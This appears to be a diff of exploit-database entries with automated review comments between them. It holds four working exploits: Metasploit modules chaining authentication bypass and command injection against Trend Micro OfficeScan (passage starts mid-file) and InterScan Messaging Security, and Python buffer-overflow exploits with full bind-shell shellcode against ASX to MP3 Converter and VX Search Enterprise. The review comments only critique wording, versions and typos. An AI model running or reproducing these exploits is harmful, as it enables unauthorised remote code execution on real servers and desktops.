print_status('Automatic targeting enabled. Trying to detect version.')
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'),
|
||||
})
|
||||
|
||||
if res && res.code == 200
|
||||
mytarget = targets[2]
|
||||
elsif res && res.code == 404
|
||||
mytarget = targets[1]
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Unable to automatically select a target')
|
||||
end
|
||||
print_status("Selected target system : #{mytarget.name}")
|
||||
end
|
||||
mytarget
|
||||
end
|
||||
|
||||
def auth(my_target)
|
||||
# Version XG performs MD5 validation on wf_CSRF_token parameter. We can't simply use PHPSESSID directly because it contains a-zA-Z0-9.
|
||||
# Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie.
|
||||
if my_target.name == 'OfficeScan XG'
|
||||
csrf_token = build_csrftoken(my_target)
|
||||
cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}"
|
||||
# Version 11 want to see valid PHPSESSID from beginning to the end. For this reason we need to force backend to initiate one for us.
|
||||
else
|
||||
vprint_status("Sending session initiation request for : #{my_target.name}.")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'),
|
||||
})
|
||||
cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}"
|
||||
csrf_token = build_csrftoken(my_target, res.get_cookies)
|
||||
end
|
||||
|
||||
# Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version.
|
||||
# Now we need to exploit authentication bypass vulnerability.
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'),
|
||||
'headers' => {
|
||||
'X-CSRFToken' => csrf_token,
|
||||
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
|
||||
},
|
||||
'cookie' => cookie,
|
||||
'vars_post' => {
|
||||
'cid' => '1',
|
||||
'act' => 'check',
|
||||
'hash' => Rex::Text.rand_text_alpha(10),
|
||||
'pid' => '1'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?('login successfully')
|
||||
# Another business logic in here.
|
||||
# Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php
|
||||
# Version XG want to use newly created PHPSESSID that comes from auth bypass response.
|
||||
if my_target.name == 'OfficeScan XG'
|
||||
res.get_cookies
|
||||
else
|
||||
cookie
|
||||
end
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
my_target = auto_target
|
||||
token = auth(my_target)
|
||||
# If we dont have a cookie that means authentication bypass issue has been patched on target system.
|
||||
if token.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
# Authentication bypass does not mean that we have a command injection.
|
||||
# Accessing to the widget framework without having command injection means literally nothing.
|
||||
# So we gonna trigger command injection vulnerability without a payload.
|
||||
csrf_token = build_csrftoken(my_target, token)
|
||||
vprint_status('Trying to detect command injection vulnerability')
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
|
||||
'headers' => {
|
||||
'X-CSRFToken' => csrf_token,
|
||||
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
|
||||
},
|
||||
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}",
|
||||
'vars_post' => {
|
||||
'module' => 'modTMCSS',
|
||||
'serverid' => '1',
|
||||
'TOP' => ''
|
||||
}
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed')
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
mytarget = auto_target
|
||||
print_status('Exploiting authentication bypass')
|
||||
cookie = auth(mytarget)
|
||||
if cookie.nil?
|
||||
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
|
||||
else
|
||||
print_good("Authenticated successfully bypassed.")
|
||||
end
|
||||
|
||||
print_status('Generating payload')
|
||||
|
||||
powershell_options = {
|
||||
encode_final_payload: true,
|
||||
remove_comspec: true
|
||||
}
|
||||
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
|
||||
|
||||
|
||||
# We need to craft csrf value for version 11 again like we did before at auth function.
|
||||
csrf_token = build_csrftoken(mytarget, cookie)
|
||||
|
||||
print_status('Trigerring command injection vulnerability')
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
|
||||
'headers' => {
|
||||
'X-CSRFToken' => csrf_token,
|
||||
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
|
||||
},
|
||||
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}",
|
||||
'vars_post' => {
|
||||
'module' => 'modTMCSS',
|
||||
'serverid' => '1',
|
||||
'TOP' => "2>&1||#{p}"
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
|
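Review bot: the 'Description' text does not match the requests made further down. It says "Talker.php takes ack and hash parameters" and refers to "Proxy.php files under the mod TMCSS folder", while auth() posts 'act' and 'hash' to talker.php and both check and exploit post to proxy_controller.php with 'module' => 'modTMCSS'. Align the description with the endpoint and parameter names actually used, so that someone matching this module against web server logs searches for the right paths. 'References' has only two URLs and no CVE identifier, and neither it nor 'Targets' names a fixed build, so the file gives no way to tell which OfficeScan 11 or XG installations are already patched. Two status strings also need correcting: "Trigerring" and "Authenticated successfully bypassed."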
130
platforms/php/webapps/42972.rb
Executable file
|
@ -0,0 +1,130 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
|
||||
terminal command under the context of the web server user.
|
||||
|
||||
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
|
||||
have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
|
||||
leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
|
||||
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
|
||||
unauthenticated users can execute a terminal command under the context of the web server user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <mr_me@offensive-security.com>', # author of command injection
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
|
||||
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 8445
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-bind'
|
||||
},
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [[ 'Automatic', {}]],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Oct 7 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def extract_jsessionid
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('JSEEEIONID')
|
||||
res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def widget_auth(jsessionid)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),
|
||||
'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}"
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')
|
||||
res.get_cookies
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
# If we've managed to bypass authentication, that means target is most likely vulnerable.
|
||||
jsessionid = extract_jsessionid
|
||||
if jsessionid.nil?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
auth = widget_auth(jsessionid)
|
||||
if auth.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status('Extracting JSESSIONID from publicly accessible log file')
|
||||
jsessionid = extract_jsessionid
|
||||
if jsessionid.nil?
|
||||
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
|
||||
else
|
||||
print_good("Awesome. JSESSIONID value = #{jsessionid}")
|
||||
end
|
||||
|
||||
print_status('Initiating session with widget framework')
|
||||
cookies = widget_auth(jsessionid)
|
||||
if cookies.nil?
|
||||
fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA")
|
||||
else
|
||||
print_good('Session with widget framework successfully initiated.')
|
||||
end
|
||||
|
||||
print_status('Trigerring command injection vulnerability')
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),
|
||||
'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}",
|
||||
'vars_post' => {
|
||||
'module' => 'modTMCSS',
|
||||
'serverid' => '1',
|
||||
'TOP' => "$(python -c \"#{payload.encoded}\")"
|
||||
}
|
||||
})
|
||||
end
|
||||
end
|
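Review bot: extract_jsessionid tests for 'JSEEEIONID' and scans with /JSEEEIONID:([A-F0-9]{32})/, while every other reference in the file is spelled JSESSIONID, and no comment says whether this is the literal key written to diagnostic.log or a typo. Add a comment stating which, since the same string is what an administrator would grep for when checking whether the log leaks session identifiers. widget_auth sends "CurrentLocale=en-U=en_US" whereas exploit sends "CurrentLocale=en-US"; one of the two is presumably unintended and should be made consistent or explained. The 'Description' names no affected or fixed IMSVA version, and check returns Appears on the log exposure and widget session alone, which its comment acknowledges; the description should state that the command injection itself is not verified by check.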
85
platforms/windows/local/42974.py
Executable file
85
platforms/windows/local/42974.py
Executable file
|
@ -0,0 +1,85 @@
|
|||
# Exploit Title: Buffer Overflow via crafted malicious .m3u file
|
||||
|
||||
|
||||
# Exploit Author: Parichay Rai
|
||||
|
||||
# Tested on: XP Service Pack 3
|
||||
|
||||
# CVE : CVE-2017-15221
|
||||
|
||||
Description
|
||||
------------
|
||||
|
||||
A buffer overflow Attack possible due to improper input mechanism
|
||||
|
||||
Proof of Concept
|
||||
----------------
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
|
||||
#This is an exploit that work well against a windows XP3 systems!
|
||||
#Successful exploit gives you a bind shell on 4444
|
||||
|
||||
BadChar= "\x00\x0a\x0d\x20"
|
||||
|
||||
# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c
|
||||
|
||||
# Successful exploitation opens port 4444 on the victim Machine
|
||||
|
||||
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9" +
|
||||
"\xb1\x56\x31\x7e\x18\x03\x7e\x18\x83\xc6\xa9\xe5\x67\xc2" +
|
||||
"\x59\x60\x87\x3b\x99\x13\x01\xde\xa8\x01\x75\xaa\x98\x95" +
|
||||
"\xfd\xfe\x10\x5d\x53\xeb\xa3\x13\x7c\x1c\x04\x99\x5a\x13" +
|
||||
"\x95\x2f\x63\xff\x55\x31\x1f\x02\x89\x91\x1e\xcd\xdc\xd0" +
|
||||
"\x67\x30\x2e\x80\x30\x3e\x9c\x35\x34\x02\x1c\x37\x9a\x08" +
|
||||
"\x1c\x4f\x9f\xcf\xe8\xe5\x9e\x1f\x40\x71\xe8\x87\xeb\xdd" +
|
||||
"\xc9\xb6\x38\x3e\x35\xf0\x35\xf5\xcd\x03\x9f\xc7\x2e\x32" +
|
||||
"\xdf\x84\x10\xfa\xd2\xd5\x55\x3d\x0c\xa0\xad\x3d\xb1\xb3" +
|
||||
"\x75\x3f\x6d\x31\x68\xe7\xe6\xe1\x48\x19\x2b\x77\x1a\x15" +
|
||||
"\x80\xf3\x44\x3a\x17\xd7\xfe\x46\x9c\xd6\xd0\xce\xe6\xfc" +
|
||||
"\xf4\x8b\xbd\x9d\xad\x71\x10\xa1\xae\xde\xcd\x07\xa4\xcd" +
|
||||
"\x1a\x31\xe7\x99\xef\x0c\x18\x5a\x67\x06\x6b\x68\x28\xbc" +
|
||||
"\xe3\xc0\xa1\x1a\xf3\x27\x98\xdb\x6b\xd6\x22\x1c\xa5\x1d" +
|
||||
"\x76\x4c\xdd\xb4\xf6\x07\x1d\x38\x23\x87\x4d\x96\x9b\x68" +
|
||||
"\x3e\x56\x4b\x01\x54\x59\xb4\x31\x57\xb3\xc3\x75\x99\xe7" +
|
||||
"\x80\x11\xd8\x17\x37\xbe\x55\xf1\x5d\x2e\x30\xa9\xc9\x8c" +
|
||||
"\x67\x62\x6e\xee\x4d\xde\x27\x78\xd9\x08\xff\x87\xda\x1e" +
|
||||
"\xac\x24\x72\xc9\x26\x27\x47\xe8\x39\x62\xef\x63\x02\xe5" +
|
||||
"\x65\x1a\xc1\x97\x7a\x37\xb1\x34\xe8\xdc\x41\x32\x11\x4b" +
|
||||
"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" +
|
||||
"\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" +
|
||||
"\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" +
|
||||
"\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" +
|
||||
"\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" +
|
||||
"\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" +
|
||||
"\x40\x61\x18\xaa")
|
||||
|
||||
buffer="http://"
|
||||
buffer+="A"*17417
|
||||
buffer+="\x53\x93\x42\x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll)
|
||||
buffer+="\x90"*10 #NOPs
|
||||
buffer+=shellcode
|
||||
buffer+="\x90"*10 #NOPs
|
||||
f=open("exploit.m3u","w")
|
||||
f.write(buffer);
|
||||
f.close()
|
||||
|
||||
----------------------
|
||||
Affected Targets
|
||||
---------------------
|
||||
|
||||
ASX to MP3 version 3.1.3.7 and May be less
|
||||
|
||||
|
||||
Solution
|
||||
---------------
|
||||
|
||||
Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc.
|
||||
|
||||
|
||||
Credits
|
||||
----------
|
||||
|
||||
Offensive Security
|
||||
Rebellious Ceaser
|
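Review bot: the version information is inconsistent and too loose to act on. The comment under "Proof of Concept" names "asx to mp3 converter 3.1.3.7.2010" while "Affected Targets" says "ASX to MP3 version 3.1.3.7 and May be less"; pick one exact version string and list which earlier versions were actually tested. The header has no vendor or software link and no date, and "A buffer overflow Attack possible due to improper input mechanism" does not say which input is mishandled, although the title and the buffer construction show it is the URL inside the .m3u playlist. The file is also committed as .py but the "Description", "Affected Targets", "Solution" and "Credits" sections and their dashed underlines are not commented out, so the file does not parse as Python as it stands.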
103
platforms/windows/remote/42973.py
Executable file
|
@ -0,0 +1,103 @@
|
|||
#!/usr/bin/env python
|
||||
# Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow
|
||||
# Exploit Author : Revnic Vasile
|
||||
# Email : revnic[at]gmail[dot]com
|
||||
# Date : 09-10-2017
|
||||
# Vendor Homepage : http://www.flexense.com/
|
||||
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe
|
||||
# Version : 10.1.12
|
||||
# Tested on : Windows 7 x86 Pro SP1
|
||||
# Category : Windows Remote Exploit
|
||||
# CVE : CVE-2017-15220
|
||||
|
||||
|
||||
import socket
|
||||
import os
|
||||
import sys
|
||||
import struct
|
||||
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c
|
||||
shellcode = ("\x89\xe5\xdb\xd3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x39\x6c\x68\x68\x6f\x72\x55\x50\x77\x70\x53\x30\x43\x50\x4d"
|
||||
"\x59\x79\x75\x66\x51\x69\x50\x45\x34\x6c\x4b\x32\x70\x70\x30"
|
||||
"\x4c\x4b\x32\x72\x64\x4c\x6e\x6b\x56\x32\x66\x74\x6e\x6b\x72"
|
||||
"\x52\x75\x78\x36\x6f\x4e\x57\x33\x7a\x57\x56\x54\x71\x4b\x4f"
|
||||
"\x4e\x4c\x65\x6c\x65\x31\x73\x4c\x44\x42\x56\x4c\x75\x70\x5a"
|
||||
"\x61\x38\x4f\x36\x6d\x63\x31\x4f\x37\x5a\x42\x58\x72\x63\x62"
|
||||
"\x70\x57\x6e\x6b\x42\x72\x44\x50\x4c\x4b\x73\x7a\x45\x6c\x6e"
|
||||
"\x6b\x72\x6c\x44\x51\x72\x58\x78\x63\x33\x78\x35\x51\x48\x51"
|
||||
"\x42\x71\x6c\x4b\x43\x69\x37\x50\x77\x71\x5a\x73\x4c\x4b\x67"
|
||||
"\x39\x77\x68\x5a\x43\x66\x5a\x53\x79\x4e\x6b\x74\x74\x4c\x4b"
|
||||
"\x43\x31\x39\x46\x70\x31\x6b\x4f\x6e\x4c\x39\x51\x78\x4f\x46"
|
||||
"\x6d\x53\x31\x38\x47\x55\x68\x39\x70\x72\x55\x7a\x56\x33\x33"
|
||||
"\x33\x4d\x4b\x48\x35\x6b\x61\x6d\x74\x64\x50\x75\x4a\x44\x31"
|
||||
"\x48\x4c\x4b\x46\x38\x56\x44\x73\x31\x69\x43\x50\x66\x4c\x4b"
|
||||
"\x46\x6c\x72\x6b\x4c\x4b\x73\x68\x67\x6c\x43\x31\x4b\x63\x4c"
|
||||
"\x4b\x46\x64\x4e\x6b\x76\x61\x48\x50\x4c\x49\x71\x54\x34\x64"
|
||||
"\x35\x74\x63\x6b\x71\x4b\x71\x71\x36\x39\x31\x4a\x46\x31\x39"
|
||||
"\x6f\x6d\x30\x43\x6f\x73\x6f\x32\x7a\x6e\x6b\x74\x52\x68\x6b"
|
||||
"\x6c\x4d\x43\x6d\x62\x48\x44\x73\x44\x72\x77\x70\x65\x50\x33"
|
||||
"\x58\x73\x47\x30\x73\x56\x52\x43\x6f\x31\x44\x61\x78\x62\x6c"
|
||||
"\x53\x47\x74\x66\x35\x57\x59\x6f\x4a\x75\x6f\x48\x4e\x70\x45"
|
||||
"\x51\x47\x70\x57\x70\x65\x79\x6f\x34\x71\x44\x62\x70\x43\x58"
|
||||
"\x46\x49\x4f\x70\x30\x6b\x53\x30\x59\x6f\x6a\x75\x72\x4a\x33"
|
||||
"\x38\x53\x69\x46\x30\x4b\x52\x69\x6d\x73\x70\x32\x70\x51\x50"
|
||||
"\x32\x70\x31\x78\x4a\x4a\x36\x6f\x49\x4f\x4b\x50\x39\x6f\x49"
|
||||
"\x45\x4e\x77\x31\x78\x75\x52\x75\x50\x57\x61\x53\x6c\x6b\x39"
|
||||
"\x7a\x46\x63\x5a\x54\x50\x71\x46\x32\x77\x43\x58\x6b\x72\x49"
|
||||
"\x4b\x76\x57\x53\x57\x39\x6f\x38\x55\x46\x37\x42\x48\x38\x37"
|
||||
"\x48\x69\x57\x48\x49\x6f\x59\x6f\x58\x55\x73\x67\x75\x38\x44"
|
||||
"\x34\x68\x6c\x57\x4b\x69\x71\x59\x6f\x7a\x75\x51\x47\x6e\x77"
|
||||
"\x50\x68\x50\x75\x72\x4e\x52\x6d\x51\x71\x6b\x4f\x4a\x75\x31"
|
||||
"\x78\x52\x43\x70\x6d\x52\x44\x67\x70\x4f\x79\x78\x63\x71\x47"
|
||||
"\x43\x67\x33\x67\x75\x61\x68\x76\x62\x4a\x55\x42\x70\x59\x56"
|
||||
"\x36\x7a\x42\x59\x6d\x53\x56\x38\x47\x32\x64\x61\x34\x45\x6c"
|
||||
"\x76\x61\x35\x51\x6c\x4d\x57\x34\x34\x64\x74\x50\x6b\x76\x43"
|
||||
"\x30\x50\x44\x30\x54\x52\x70\x50\x56\x53\x66\x53\x66\x42\x66"
|
||||
"\x46\x36\x70\x4e\x30\x56\x53\x66\x72\x73\x30\x56\x31\x78\x33"
|
||||
"\x49\x38\x4c\x65\x6f\x4d\x56\x4b\x4f\x59\x45\x4b\x39\x79\x70"
|
||||
"\x32\x6e\x73\x66\x33\x76\x6b\x4f\x30\x30\x31\x78\x65\x58\x6f"
|
||||
"\x77\x67\x6d\x31\x70\x79\x6f\x38\x55\x6d\x6b\x6a\x50\x4e\x55"
|
||||
"\x69\x32\x30\x56\x33\x58\x4c\x66\x4e\x75\x4d\x6d\x4d\x4d\x59"
|
||||
"\x6f\x38\x55\x37\x4c\x57\x76\x33\x4c\x54\x4a\x6d\x50\x6b\x4b"
|
||||
"\x4b\x50\x32\x55\x53\x35\x4d\x6b\x63\x77\x57\x63\x73\x42\x32"
|
||||
"\x4f\x52\x4a\x37\x70\x51\x43\x4b\x4f\x58\x55\x41\x41")
|
||||
|
||||
|
||||
buf_totlen = 5000
|
||||
dist_seh = 2492
|
||||
nseh = "\xeb\x06AA"
|
||||
seh = 0x1011369e
|
||||
nops = "\x90" * 10
|
||||
|
||||
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
|
||||
"\x77\x30\x30\x74"
|
||||
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
|
||||
|
||||
egg = "w00tw00t"
|
||||
|
||||
payload = ""
|
||||
payload += "A"*(dist_seh - len(payload))
|
||||
payload += nseh
|
||||
payload += struct.pack("<I", seh)
|
||||
payload += nops
|
||||
payload += egghunter
|
||||
payload += egg
|
||||
payload += shellcode
|
||||
payload += "D"*(buf_totlen - len(payload))
|
||||
|
||||
buf = "POST /../%s HTTP/1.1\r\n" %payload
|
||||
buf += "Host: 10.10.10.10\r\n"
|
||||
buf += "User-Agent: Mozilla/5.0\r\n"
|
||||
buf += "Connection: close\r\n"
|
||||
buf += "\r\n"
|
||||
|
||||
print "Sending the payload!"
|
||||
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
|
||||
expl.connect(("10.10.10.10", 80))
|
||||
expl.send(buf)
|
||||
expl.close()
|
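Review bot: the header gives "Version : 10.1.12" and "Tested on : Windows 7 x86 Pro SP1" but says nothing about whether earlier builds are affected or whether a fixed release exists, so the entry cannot be used to decide which installations need attention; add that, or state that it is unknown. "Date : 09-10-2017" is ambiguous between day-first and month-first and should use an unambiguous format. On style, `import os` and `import sys` are never used, and the address 10.10.10.10 is hardcoded separately in the Host header and in the connect call.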